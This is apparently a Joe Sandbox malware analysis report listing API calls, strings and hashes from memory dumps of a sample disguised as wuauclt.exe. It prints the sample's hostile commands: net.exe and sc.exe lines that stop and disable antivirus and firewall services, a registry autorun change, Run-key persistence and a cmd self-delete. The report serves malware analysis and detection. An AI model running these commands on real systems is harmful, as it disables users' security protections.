                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction ID: cf7fc80abf0a610b938b0f6de2e472192636330f029e0b36f2c69517e1b1d411
                                                                            • Opcode Fuzzy Hash: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction Fuzzy Hash: E5018831A443189BDB359E29CC04BDAB7B1EB44750F2104ADF584B7281CAB4AE808E08
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction ID: 24a9b9a5f53f68d2e9ae0a20dfd92328ab467e55e5b9cffb966d9a0b50497f93
                                                                            • Opcode Fuzzy Hash: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction Fuzzy Hash: 48A022C222330002C80022F20CC2EA2808CA2082EA3A000A23000C00A3C82C08800020
                                                                            APIs
                                                                            • Sleep.KERNEL32(000493E0), ref: 004084BD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1839875000-0
                                                                            • Opcode ID: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction ID: 531a484f82c7889d25c20d7142e9803b131f223dc912937a257ed96ba5c7c79c
                                                                            • Opcode Fuzzy Hash: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            • Sleep.KERNEL32(0000012C,00000000,0040775D,?,00000003,00000000,00000000), ref: 004073A8
                                                                            • ShellExecuteA.SHELL32(00000000,open,regedit.exe,00000000,noruns.reg,?), ref: 004073E8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop sharedaccess,00000000,00000000), ref: 00407402
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVWSC,00000000,00000000), ref: 0040741C
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVWSC start= disabled,00000000,00000000), ref: 00407436
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVSrvXP,00000000,00000000), ref: 00407450
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVSrvXP start= disabled,00000000,00000000), ref: 0040746A
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop kavsvc,00000000,00000000), ref: 00407484
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config kavsvc start= disabled,00000000,00000000), ref: 0040749E
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsRavMon start= disabled,00000000,00000000), ref: 004074B8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsCCenter,00000000,00000000), ref: 004074D2
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000), ref: 004074EC
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsRavMon,00000000,00000000), ref: 00407506
                                                                            • Sleep.KERNEL32(00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000,open,net.exe), ref: 00407510
                                                                            • FindWindowA.USER32(#32770,00407944), ref: 0040751F
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00407958), ref: 00407531
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00407544
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000), ref: 00407681
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled), ref: 004076D8
                                                                            • Sleep.KERNEL32(00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 004076E4
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 00407709
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShell$FileSleep$AttributesFindWindow$CloseDeleteDirectoryMessageSendValueWindows
                                                                            • String ID: /s $"NoDriveTypeAutoRun"=dword:bd$#32770$Button$CCenter.exe$EGHOST.exe$KVCenter.kxp$KVMonXP.exe$KVSrvXp_1.exe$Kav.exe$KavPFW.exe$KpopMon.exe$Kvsrvxp.exe$Microsoft$Nvsvc32.exe$PFW.exe$RAVMON.exe$RAVTIMER.exe$REGEDIT4$RRfwMain.exe$RavMonD.exe$RavService.exe$RfwMain.exe$Rtvscan.exe$Software\Microsoft\Windows\CurrentVersion\Run$VPTray.exe$[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]$config KVSrvXP start= disabled$config KVWSC start= disabled$config RsCCenter start= disabled$config RsRavMon start= disabled$config kavsvc start= disabled$kav32.exe$kavstart.exe$kavsvc.exe$kvwsc.exe$net.exe$net.exe$net1.exe$noruns.reg$open$regedit.exe$regedit.exe$sc.exe$sc.exe$sc1.exe$stop KVSrvXP$stop KVWSC$stop RsCCenter$stop RsRavMon$stop kavsvc$stop sharedaccess$wuauclt.exe
                                                                            • API String ID: 4147674485-668396500
                                                                            • Opcode ID: 2e8965b326de6fdb6a0ae8cd9e9f8423980809dc199509a3da33a66f5c7fd3a0
                                                                            • Instruction ID: ad58a2a6b321d20f2a5f7c4230813dddbb1cdd15f012d9e1a88ffbed65f06cfb
                                                                            • Opcode Fuzzy Hash: 2e8965b326de6fdb6a0ae8cd9e9f8423980809dc199509a3da33a66f5c7fd3a0
                                                                            • Instruction Fuzzy Hash: A6A10DB5F8828526D700B7A68C47F5E75649B84B09F20C47BB7147A2C3CABCB944867F
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                            • API String ID: 667068680-597814768
                                                                            • Opcode ID: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction ID: 023e8f8eb36bf4682933e0370cb39b54a2ce952b5e9d5c020180350aed9ba6c9
                                                                            • Opcode Fuzzy Hash: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction Fuzzy Hash: 6231C9F06403509FDB11EBB5AA85A2933E8EB96305750657ABA00EF6D4D77CC810CB1E
                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • FindWindowA.USER32(#32770,00000000), ref: 00406CE5
                                                                            • GetWindowTextA.USER32(00000000,0040AEDC,00000104), ref: 00406D17
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406DC3
                                                                            • FindWindowExA.USER32(00000000,00000000,AfxWnd42,00000000), ref: 00406DE1
                                                                            • FindWindowExA.USER32(00000000,00000000,RICHEDIT,00000000), ref: 00406DFF
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00406F50), ref: 00406E20
                                                                            • FindWindowExA.USER32(00000000,00000000,RichEdit20A,00000000), ref: 00406E3E
                                                                            • SendMessageA.USER32(00000000,000000C2,000000B4,00000000), ref: 00406E7E
                                                                            • Sleep.KERNEL32(000002BC,00000000,000000C2,000000B4,00000000,00000000,00000000,RichEdit20A,00000000,00000000,00000000,Button,00406F50,00000000,00000000,RICHEDIT), ref: 00406E88
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00406E9E
                                                                            • SendMessageA.USER32(00000000,0000000C,00000000,00406F70), ref: 00406EB4
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406ECC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessageSend$DirectorySleepTextWindows
                                                                            • String ID: #32770$AfxWnd42$Button$RICHEDIT$RichEdit20A$bbyb.dll
                                                                            • API String ID: 4044579835-3821104793
                                                                            • Opcode ID: 46ea4ccefd413482a5f41c00c70f7caddd4a92c960c66dc50a95b78dce87a446
                                                                            • Instruction ID: c2cdf916bea0aacb3b287b9c217ab58656c52756c70eb46c7f93f36c1c6821be
                                                                            • Opcode Fuzzy Hash: 46ea4ccefd413482a5f41c00c70f7caddd4a92c960c66dc50a95b78dce87a446
                                                                            • Instruction Fuzzy Hash: 53813670340206AFE710EF64D986F5A77A9EB85704F51407AF901BB2E2D7B8AD50CB9C
APIs
• CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402613
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040261D
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040263A
• CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402644
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040266D
• CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 00402677
• CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040269B
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 004026A5
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: CharNext
• String ID: "$"
• API String ID: 3213498283-3758156766
• Opcode ID: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
• Instruction ID: 378b31890ac25dcdd700d67078953c889e09c483e5a359b479ed21abc8ee7f2f
• Opcode Fuzzy Hash: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
• Instruction Fuzzy Hash: 1921E8606043912ADF3129754EC836B6B894A1B704B680DBB95C1BB3C7D4FE488B976E
APIs
• GetClassNameA.USER32(?,?,00000100), ref: 00405443
• SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
• SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: MessageSend$ClassName
• String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
• API String ID: 787153527-2237947760
• Opcode ID: e6dd1c336fd68df088ead3fc59d869204d5951e62e543e13391f321828f78c9e
• Instruction ID: 9fb5fde48b0b51318b29d690c95603ab6f24dde2ee0048554a78b08ccb085c6b
• Opcode Fuzzy Hash: e6dd1c336fd68df088ead3fc59d869204d5951e62e543e13391f321828f78c9e
• Instruction Fuzzy Hash: B3214FB0A4061C6ADB20EF64CC89BDAB7B9EB48304F5045F7B508F6181D6B85E808E98
APIs
• GetClassNameA.USER32(?,?,00000100), ref: 00405443
• SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
• SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: MessageSend$ClassName
• String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
• API String ID: 787153527-2237947760
• Opcode ID: 3734ebd2b0ab7302f724bbed31c4d32c1c78400722493264dc8d04771cd8ac10
• Instruction ID: 0425c3d2602aa380be99970c4860828b2cef43e56b29c4e0dd38b7bacb301f0e
• Opcode Fuzzy Hash: 3734ebd2b0ab7302f724bbed31c4d32c1c78400722493264dc8d04771cd8ac10
• Instruction Fuzzy Hash: BF2150B094061C6ADB20EF64CC89BDBB7B9EB48304F5045F7A508B7181D7B85F808E98
APIs
• GetVersionExA.KERNEL32(?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049DA
• LoadLibraryA.KERNEL32(kernel32.dll,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049F5
• GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00404A13
• FreeLibrary.KERNEL32(00000000,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 00404A2D
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: Library$AddressFreeLoadProcVersion
• String ID: RegisterServiceProcess$kernel32.dll
• API String ID: 493525861-4020013434
• Opcode ID: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
• Instruction ID: 584902bb4f43a048dfb4edc9276af123f762f69e99b58a94aa2e669f31c097c7
• Opcode Fuzzy Hash: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
• Instruction Fuzzy Hash: F6F012F17C13009BD611EB759E0AB1932A4E7E4706F40447BB784B72D1E77D8456CA1E
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
• RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
• Opcode ID: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
• Instruction ID: 5b13f427154e47eb786ec22587604168a85df8ea8a10eb055b4820c5abfa16c8
• Opcode Fuzzy Hash: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
• Instruction Fuzzy Hash: 7A019275500308BADB11DF909C42FAA7BBCE709701F6005B6B910F65D1E6799B50D75C
APIs
• GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
  • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
• WinExec.KERNEL32(00000000,004051C8), ref: 00405174
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: EnvironmentExecFileModuleNameVariable
• String ID: /c del "$Comspec
• API String ID: 451393584-1443122049
• Opcode ID: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
• Instruction ID: 6f675109087fc91689d1b7d6d1dc425710a191357d6ada5f1f571d808edafb71
• Opcode Fuzzy Hash: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
• Instruction Fuzzy Hash: 74118270E006185FDB25EB61CC02BDABBB9EB49700F5145FBA648F61C1D6F84A808E65
APIs
• GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
  • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
• WinExec.KERNEL32(00000000,004051C8), ref: 00405174
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: EnvironmentExecFileModuleNameVariable
• String ID: /c del "$Comspec
• API String ID: 451393584-1443122049
• Opcode ID: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
• Instruction ID: 5e39bd01bb10aff84b20b8e8c33debca7a73d60c2ec277af15caf5139dfd1cd6
• Opcode Fuzzy Hash: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
• Instruction Fuzzy Hash: 5E116170E0061C5FDB25EB61CC02BDABBB9EB48700F5145F6A608F61C1E6F85A808E69
APIs
• RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
• RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
• LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
• RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
Memory Dump Source
